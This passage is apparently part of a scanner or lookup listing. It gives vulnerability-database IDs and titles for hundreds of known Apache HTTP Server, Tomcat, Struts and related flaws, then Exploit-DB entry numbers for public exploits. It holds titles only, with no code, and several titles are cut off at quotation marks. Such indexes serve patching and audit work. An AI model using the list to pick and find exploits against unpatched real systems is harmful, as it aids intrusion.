6880| [70336] Apache HTTP Server mod_proxy information disclosure
6881| [69804] Apache HTTP Server mod_proxy_ajp denial of service
6882| [69472] Apache Tomcat AJP security bypass
6883| [69396] Apache HTTP Server ByteRange filter denial of service
6884| [69394] Apache Wicket multi window support cross-site scripting
6885| [69176] Apache Tomcat XML information disclosure
6886| [69161] Apache Tomcat jsvc information disclosure
6887| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
6888| [68541] Apache Tomcat sendfile information disclosure
6889| [68420] Apache XML Security denial of service
6890| [68238] Apache Tomcat JMX information disclosure
6891| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
6892| [67804] Apache Subversion control rules information disclosure
6893| [67803] Apache Subversion control rules denial of service
6894| [67802] Apache Subversion baselined denial of service
6895| [67672] Apache Archiva multiple cross-site scripting
6896| [67671] Apache Archiva multiple cross-site request forgery
6897| [67564] Apache APR apr_fnmatch() denial of service
6898| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
6899| [67515] Apache Tomcat annotations security bypass
6900| [67480] Apache Struts s:submit information disclosure
6901| [67414] Apache APR apr_fnmatch() denial of service
6902| [67356] Apache Struts javatemplates cross-site scripting
6903| [67354] Apache Struts Xwork cross-site scripting
6904| [66676] Apache Tomcat HTTP BIO information disclosure
6905| [66675] Apache Tomcat web.xml security bypass
6906| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
6907| [66241] Apache HttpComponents information disclosure
6908| [66154] Apache Tomcat ServletSecurity security bypass
6909| [65971] Apache Tomcat ServletSecurity security bypass
6910| [65876] Apache Subversion mod_dav_svn denial of service
6911| [65343] Apache Continuum unspecified cross-site scripting
6912| [65162] Apache Tomcat NIO connector denial of service
6913| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
6914| [65160] Apache Tomcat HTML Manager interface cross-site scripting
6915| [65159] Apache Tomcat ServletContect security bypass
6916| [65050] Apache CouchDB web-based administration UI cross-site scripting
6917| [64773] Oracle HTTP Server Apache Plugin unauthorized access
6918| [64473] Apache Subversion blame -g denial of service
6919| [64472] Apache Subversion walk() denial of service
6920| [64407] Apache Axis2 CVE-2010-0219 code execution
6921| [63926] Apache Archiva password privilege escalation
6922| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
6923| [63493] Apache Archiva credentials cross-site request forgery
6924| [63477] Apache Tomcat HttpOnly session hijacking
6925| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
6926| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
6927| [62959] Apache Shiro filters security bypass
6928| [62790] Apache Perl cgi module denial of service
6929| [62576] Apache Qpid exchange denial of service
6930| [62575] Apache Qpid AMQP denial of service
6931| [62354] Apache Qpid SSL denial of service
6932| [62235] Apache APR-util apr_brigade_split_line() denial of service
6933| [62181] Apache XML-RPC SAX Parser information disclosure
6934| [61721] Apache Traffic Server cache poisoning
6935| [61202] Apache Derby BUILTIN authentication functionality information disclosure
6936| [61186] Apache CouchDB Futon cross-site request forgery
6937| [61169] Apache CXF DTD denial of service
6938| [61070] Apache Jackrabbit search.jsp SQL injection
6939| [61006] Apache SLMS Quoting cross-site request forgery
6940| [60962] Apache Tomcat time cross-site scripting
6941| [60883] Apache mod_proxy_http information disclosure
6942| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
6943| [60264] Apache Tomcat Transfer-Encoding denial of service
6944| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
6945| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
6946| [59413] Apache mod_proxy_http timeout information disclosure
6947| [59058] Apache MyFaces unencrypted view state cross-site scripting
6948| [58827] Apache Axis2 xsd file include
6949| [58790] Apache Axis2 modules cross-site scripting
6950| [58299] Apache ActiveMQ queueBrowse cross-site scripting
6951| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
6952| [58056] Apache ActiveMQ .jsp source code disclosure
6953| [58055] Apache Tomcat realm name information disclosure
6954| [58046] Apache HTTP Server mod_auth_shadow security bypass
6955| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
6956| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
6957| [57429] Apache CouchDB algorithms information disclosure
6958| [57398] Apache ActiveMQ Web console cross-site request forgery
6959| [57397] Apache ActiveMQ createDestination.action cross-site scripting
6960| [56653] Apache HTTP Server DNS spoofing
6961| [56652] Apache HTTP Server DNS cross-site scripting
6962| [56625] Apache HTTP Server request header information disclosure
6963| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
6964| [56623] Apache HTTP Server mod_proxy_ajp denial of service
6965| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
6966| [55857] Apache Tomcat WAR files directory traversal
6967| [55856] Apache Tomcat autoDeploy attribute security bypass
6968| [55855] Apache Tomcat WAR directory traversal
6969| [55210] Intuit component for Joomla! Apache information disclosure
6970| [54533] Apache Tomcat 404 error page cross-site scripting
6971| [54182] Apache Tomcat admin default password
6972| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
6973| [53666] Apache HTTP Server Solaris pollset support denial of service
6974| [53650] Apache HTTP Server HTTP basic-auth module security bypass
6975| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
6976| [53041] mod_proxy_ftp module for Apache denial of service
6977| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
6978| [51953] Apache Tomcat Path Disclosure
6979| [51952] Apache Tomcat Path Traversal
6980| [51951] Apache stronghold-status Information Disclosure
6981| [51950] Apache stronghold-info Information Disclosure
6982| [51949] Apache PHP Source Code Disclosure
6983| [51948] Apache Multiviews Attack
6984| [51946] Apache JServ Environment Status Information Disclosure
6985| [51945] Apache error_log Information Disclosure
6986| [51944] Apache Default Installation Page Pattern Found
6987| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
6988| [51942] Apache AXIS XML External Entity File Retrieval
6989| [51941] Apache AXIS Sample Servlet Information Leak
6990| [51940] Apache access_log Information Disclosure
6991| [51626] Apache mod_deflate denial of service
6992| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
6993| [51365] Apache Tomcat RequestDispatcher security bypass
6994| [51273] Apache HTTP Server Incomplete Request denial of service
6995| [51195] Apache Tomcat XML information disclosure
6996| [50994] Apache APR-util xml/apr_xml.c denial of service
6997| [50993] Apache APR-util apr_brigade_vprintf denial of service
6998| [50964] Apache APR-util apr_strmatch_precompile() denial of service
6999| [50930] Apache Tomcat j_security_check information disclosure
7000| [50928] Apache Tomcat AJP denial of service
7001| [50884] Apache HTTP Server XML ENTITY denial of service
7002| [50808] Apache HTTP Server AllowOverride privilege escalation
7003| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
7004| [50059] Apache mod_proxy_ajp information disclosure
7005| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
7006| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
7007| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
7008| [49921] Apache ActiveMQ Web interface cross-site scripting
7009| [49898] Apache Geronimo Services/Repository directory traversal
7010| [49725] Apache Tomcat mod_jk module information disclosure
7011| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
7012| [49712] Apache Struts unspecified cross-site scripting
7013| [49213] Apache Tomcat cal2.jsp cross-site scripting
7014| [48934] Apache Tomcat POST doRead method information disclosure
7015| [48211] Apache Tomcat header HTTP request smuggling
7016| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
7017| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
7018| [47709] Apache Roller "
7019| [47104] Novell Netware ApacheAdmin console security bypass
7020| [47086] Apache HTTP Server OS fingerprinting unspecified
7021| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
7022| [45791] Apache Tomcat RemoteFilterValve security bypass
7023| [44435] Oracle WebLogic Apache Connector buffer overflow
7024| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
7025| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
7026| [44156] Apache Tomcat RequestDispatcher directory traversal
7027| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
7028| [43885] Oracle WebLogic Server Apache Connector buffer overflow
7029| [42987] Apache HTTP Server mod_proxy module denial of service
7030| [42915] Apache Tomcat JSP files path disclosure
7031| [42914] Apache Tomcat MS-DOS path disclosure
7032| [42892] Apache Tomcat unspecified unauthorized access
7033| [42816] Apache Tomcat Host Manager cross-site scripting
7034| [42303] Apache 403 error cross-site scripting
7035| [41618] Apache-SSL ExpandCert() authentication bypass
7036| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
7037| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
7038| [40614] Apache mod_jk2 HTTP Host header buffer overflow
7039| [40562] Apache Geronimo init information disclosure
7040| [40478] Novell Web Manager webadmin-apache.conf security bypass
7041| [40411] Apache Tomcat exception handling information disclosure
7042| [40409] Apache Tomcat native (APR based) connector weak security
7043| [40403] Apache Tomcat quotes and %5C cookie information disclosure
7044| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
7045| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
7046| [39867] Apache HTTP Server mod_negotiation cross-site scripting
7047| [39804] Apache Tomcat SingleSignOn information disclosure
7048| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
7049| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
7050| [39608] Apache HTTP Server balancer manager cross-site request forgery
7051| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
7052| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
7053| [39472] Apache HTTP Server mod_status cross-site scripting
7054| [39201] Apache Tomcat JULI logging weak security
7055| [39158] Apache HTTP Server Windows SMB shares information disclosure
7056| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
7057| [38951] Apache::AuthCAS Perl module cookie SQL injection
7058| [38800] Apache HTTP Server 413 error page cross-site scripting
7059| [38211] Apache Geronimo SQLLoginModule authentication bypass
7060| [37243] Apache Tomcat WebDAV directory traversal
7061| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
7062| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
7063| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
7064| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
7065| [36782] Apache Geronimo MEJB unauthorized access
7066| [36586] Apache HTTP Server UTF-7 cross-site scripting
7067| [36468] Apache Geronimo LoginModule security bypass
7068| [36467] Apache Tomcat functions.jsp cross-site scripting
7069| [36402] Apache Tomcat calendar cross-site request forgery
7070| [36354] Apache HTTP Server mod_proxy module denial of service
7071| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
7072| [36336] Apache Derby lock table privilege escalation
7073| [36335] Apache Derby schema privilege escalation
7074| [36006] Apache Tomcat "
7075| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
7076| [35999] Apache Tomcat \"
7077| [35795] Apache Tomcat CookieExample cross-site scripting
7078| [35536] Apache Tomcat SendMailServlet example cross-site scripting
7079| [35384] Apache HTTP Server mod_cache module denial of service
7080| [35097] Apache HTTP Server mod_status module cross-site scripting
7081| [35095] Apache HTTP Server Prefork MPM module denial of service
7082| [34984] Apache HTTP Server recall_headers information disclosure
7083| [34966] Apache HTTP Server MPM content spoofing
7084| [34965] Apache HTTP Server MPM information disclosure
7085| [34963] Apache HTTP Server MPM multiple denial of service
7086| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
7087| [34869] Apache Tomcat JSP example Web application cross-site scripting
7088| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
7089| [34496] Apache Tomcat JK Connector security bypass
7090| [34377] Apache Tomcat hello.jsp cross-site scripting
7091| [34212] Apache Tomcat SSL configuration security bypass
7092| [34210] Apache Tomcat Accept-Language cross-site scripting
7093| [34209] Apache Tomcat calendar application cross-site scripting
7094| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
7095| [34167] Apache Axis WSDL file path disclosure
7096| [34068] Apache Tomcat AJP connector information disclosure
7097| [33584] Apache HTTP Server suEXEC privilege escalation
7098| [32988] Apache Tomcat proxy module directory traversal
7099| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
7100| [32708] Debian Apache tty privilege escalation
7101| [32441] ApacheStats extract() PHP call unspecified
7102| [32128] Apache Tomcat default account
7103| [31680] Apache Tomcat RequestParamExample cross-site scripting
7104| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
7105| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
7106| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
7107| [30456] Apache mod_auth_kerb off-by-one buffer overflow
7108| [29550] Apache mod_tcl set_var() format string
7109| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
7110| [28357] Apache HTTP Server mod_alias script source information disclosure
7111| [28063] Apache mod_rewrite off-by-one buffer overflow
7112| [27902] Apache Tomcat URL information disclosure
7113| [26786] Apache James SMTP server denial of service
7114| [25680] libapache2 /tmp/svn file upload
7115| [25614] Apache Struts lookupMap cross-site scripting
7116| [25613] Apache Struts ActionForm denial of service
7117| [25612] Apache Struts isCancelled() security bypass
7118| [24965] Apache mod_python FileSession command execution
7119| [24716] Apache James spooler memory leak denial of service
7120| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
7121| [24158] Apache Geronimo jsp-examples cross-site scripting
7122| [24030] Apache auth_ldap module multiple format strings
7123| [24008] Apache mod_ssl custom error message denial of service
7124| [24003] Apache mod_auth_pgsql module multiple syslog format strings
7125| [23612] Apache mod_imap referer field cross-site scripting
7126| [23173] Apache Struts error message cross-site scripting
7127| [22942] Apache Tomcat directory listing denial of service
7128| [22858] Apache Multi-Processing Module code allows denial of service
7129| [22602] RHSA-2005:582 updates for Apache httpd not installed
7130| [22520] Apache mod-auth-shadow "
7131| [22466] ApacheTop symlink
7132| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
7133| [22006] Apache HTTP Server byte-range filter denial of service
7134| [21567] Apache mod_ssl off-by-one buffer overflow
7135| [21195] Apache HTTP Server header HTTP request smuggling
7136| [20383] Apache HTTP Server htdigest buffer overflow
7137| [19681] Apache Tomcat AJP12 request denial of service
7138| [18993] Apache HTTP server check_forensic symlink attack
7139| [18790] Apache Tomcat Manager cross-site scripting
7140| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
7141| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
7142| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
7143| [17961] Apache Web server ServerTokens has not been set
7144| [17930] Apache HTTP Server HTTP GET request denial of service
7145| [17785] Apache mod_include module buffer overflow
7146| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
7147| [17473] Apache HTTP Server Satisfy directive allows access to resources
7148| [17413] Apache htpasswd buffer overflow
7149| [17384] Apache HTTP Server environment variable configuration file buffer overflow
7150| [17382] Apache HTTP Server IPv6 apr_util denial of service
7151| [17366] Apache HTTP Server mod_dav module LOCK denial of service
7152| [17273] Apache HTTP Server speculative mode denial of service
7153| [17200] Apache HTTP Server mod_ssl denial of service
7154| [16890] Apache HTTP Server server-info request has been detected
7155| [16889] Apache HTTP Server server-status request has been detected
7156| [16705] Apache mod_ssl format string attack
7157| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
7158| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
7159| [16230] Apache HTTP Server PHP denial of service
7160| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
7161| [15958] Apache HTTP Server authentication modules memory corruption
7162| [15547] Apache HTTP Server mod_disk_cache local information disclosure
7163| [15540] Apache HTTP Server socket starvation denial of service
7164| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
7165| [15422] Apache HTTP Server mod_access information disclosure
7166| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
7167| [15293] Apache for Cygwin "
7168| [15065] Apache-SSL has a default password
7169| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
7170| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
7171| [14751] Apache Mod_python output filter information disclosure
7172| [14125] Apache HTTP Server mod_userdir module information disclosure
7173| [14075] Apache HTTP Server mod_php file descriptor leak
7174| [13703] Apache HTTP Server account
7175| [13689] Apache HTTP Server configuration allows symlinks
7176| [13688] Apache HTTP Server configuration allows SSI
7177| [13687] Apache HTTP Server Server: header value
7178| [13685] Apache HTTP Server ServerTokens value
7179| [13684] Apache HTTP Server ServerSignature value
7180| [13672] Apache HTTP Server config allows directory autoindexing
7181| [13671] Apache HTTP Server default content
7182| [13670] Apache HTTP Server config file directive references outside content root
7183| [13668] Apache HTTP Server httpd not running in chroot environment
7184| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
7185| [13664] Apache HTTP Server config file contains ScriptAlias entry
7186| [13663] Apache HTTP Server CGI support modules loaded
7187| [13661] Apache HTTP Server config file contains AddHandler entry
7188| [13660] Apache HTTP Server 500 error page not CGI script
7189| [13659] Apache HTTP Server 413 error page not CGI script
7190| [13658] Apache HTTP Server 403 error page not CGI script
7191| [13657] Apache HTTP Server 401 error page not CGI script
7192| [13552] Apache HTTP Server mod_cgid module information disclosure
7193| [13550] Apache GET request directory traversal
7194| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
7195| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
7196| [13429] Apache Tomcat non-HTTP request denial of service
7197| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
7198| [13295] Apache weak password encryption
7199| [13254] Apache Tomcat .jsp cross-site scripting
7200| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
7201| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
7202| [12681] Apache HTTP Server mod_proxy could allow mail relaying
7203| [12662] Apache HTTP Server rotatelogs denial of service
7204| [12554] Apache Tomcat stores password in plain text
7205| [12553] Apache HTTP Server redirects and subrequests denial of service
7206| [12552] Apache HTTP Server FTP proxy server denial of service
7207| [12551] Apache HTTP Server prefork MPM denial of service
7208| [12550] Apache HTTP Server weaker than expected encryption
7209| [12549] Apache HTTP Server type-map file denial of service
7210| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
7211| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
7212| [12091] Apache HTTP Server apr_password_validate denial of service
7213| [12090] Apache HTTP Server apr_psprintf code execution
7214| [11804] Apache HTTP Server mod_access_referer denial of service
7215| [11750] Apache HTTP Server could leak sensitive file descriptors
7216| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
7217| [11703] Apache long slash path allows directory listing
7218| [11695] Apache HTTP Server LF (Line Feed) denial of service
7219| [11694] Apache HTTP Server filestat.c denial of service
7220| [11438] Apache HTTP Server MIME message boundaries information disclosure
7221| [11412] Apache HTTP Server error log terminal escape sequence injection
7222| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
7223| [11195] Apache Tomcat web.xml could be used to read files
7224| [11194] Apache Tomcat URL appended with a null character could list directories
7225| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
7226| [11126] Apache HTTP Server illegal character file disclosure
7227| [11125] Apache HTTP Server DOS device name HTTP POST code execution
7228| [11124] Apache HTTP Server DOS device name denial of service
7229| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
7230| [10938] Apache HTTP Server printenv test CGI cross-site scripting
7231| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
7232| [10575] Apache mod_php module could allow an attacker to take over the httpd process
7233| [10499] Apache HTTP Server WebDAV HTTP POST view source
7234| [10457] Apache HTTP Server mod_ssl "
7235| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
7236| [10414] Apache HTTP Server htdigest multiple buffer overflows
7237| [10413] Apache HTTP Server htdigest temporary file race condition
7238| [10412] Apache HTTP Server htpasswd temporary file race condition
7239| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
7240| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
7241| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
7242| [10280] Apache HTTP Server shared memory scorecard overwrite
7243| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
7244| [10241] Apache HTTP Server Host: header cross-site scripting
7245| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
7246| [10208] Apache HTTP Server mod_dav denial of service
7247| [10206] HP VVOS Apache mod_ssl denial of service
7248| [10200] Apache HTTP Server stderr denial of service
7249| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
7250| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
7251| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
7252| [10098] Slapper worm targets OpenSSL/Apache systems
7253| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
7254| [9875] Apache HTTP Server .var file request could disclose installation path
7255| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
7256| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
7257| [9623] Apache HTTP Server ap_log_rerror() path disclosure
7258| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
7259| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
7260| [9396] Apache Tomcat null character to threads denial of service
7261| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
7262| [9249] Apache HTTP Server chunked encoding heap buffer overflow
7263| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
7264| [8932] Apache Tomcat example class information disclosure
7265| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
7266| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
7267| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
7268| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
7269| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
7270| [8400] Apache HTTP Server mod_frontpage buffer overflows
7271| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
7272| [8308] Apache "
7273| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
7274| [8119] Apache and PHP OPTIONS request reveals "
7275| [8054] Apache is running on the system
7276| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
7277| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
7278| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
7279| [7836] Apache HTTP Server log directory denial of service
7280| [7815] Apache for Windows "
7281| [7810] Apache HTTP request could result in unexpected behavior
7282| [7599] Apache Tomcat reveals installation path
7283| [7494] Apache "
7284| [7419] Apache Web Server could allow remote attackers to overwrite .log files
7285| [7363] Apache Web Server hidden HTTP requests
7286| [7249] Apache mod_proxy denial of service
7287| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
7288| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
7289| [7059] Apache "
7290| [7057] Apache "
7291| [7056] Apache "
7292| [7055] Apache "
7293| [7054] Apache "
7294| [6997] Apache Jakarta Tomcat error message may reveal information
7295| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
7296| [6970] Apache crafted HTTP request could reveal the internal IP address
7297| [6921] Apache long slash path allows directory listing
7298| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
7299| [6527] Apache Web Server for Windows and OS2 denial of service
7300| [6316] Apache Jakarta Tomcat may reveal JSP source code
7301| [6305] Apache Jakarta Tomcat directory traversal
7302| [5926] Linux Apache symbolic link
7303| [5659] Apache Web server discloses files when used with php script
7304| [5310] Apache mod_rewrite allows attacker to view arbitrary files
7305| [5204] Apache WebDAV directory listings
7306| [5197] Apache Web server reveals CGI script source code
7307| [5160] Apache Jakarta Tomcat default installation
7308| [5099] Trustix Secure Linux installs Apache with world writable access
7309| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
7310| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
7311| [4931] Apache source.asp example file allows users to write to files
7312| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
7313| [4205] Apache Jakarta Tomcat delivers file contents
7314| [2084] Apache on Debian by default serves the /usr/doc directory
7315| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
7316| [697] Apache HTTP server beck exploit
7317| [331] Apache cookies buffer overflow
7318|
7319| Exploit-DB - https://www.exploit-db.com:
7320| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
7321| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
7322| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
7323| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
7324| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
7325| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
7326| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
7327| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
7328| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
7329| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
7330| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
7331| [29859] Apache Roller OGNL Injection
7332| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
7333| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
7334| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
7335| [29290] Apache / PHP 5.x Remote Code Execution Exploit
7336| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
7337| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
7338| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
7339| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
7340| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
7341| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
7342| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
7343| [27096] Apache Geronimo 1.0 Error Page XSS
7344| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
7345| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
7346| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
7347| [25986] Plesk Apache Zeroday Remote Exploit
7348| [25980] Apache Struts includeParams Remote Code Execution
7349| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
7350| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
7351| [24874] Apache Struts ParametersInterceptor Remote Code Execution
7352| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
7353| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
7354| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
7355| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
7356| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
7357| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
7358| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
7359| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
7360| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
7361| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
7362| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
7363| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
7364| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
7365| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
7366| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
7367| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
7368| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
7369| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
7370| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
7371| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
7372| [21719] Apache 2.0 Path Disclosure Vulnerability
7373| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
7374| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
7375| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
7376| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
7377| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
7378| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
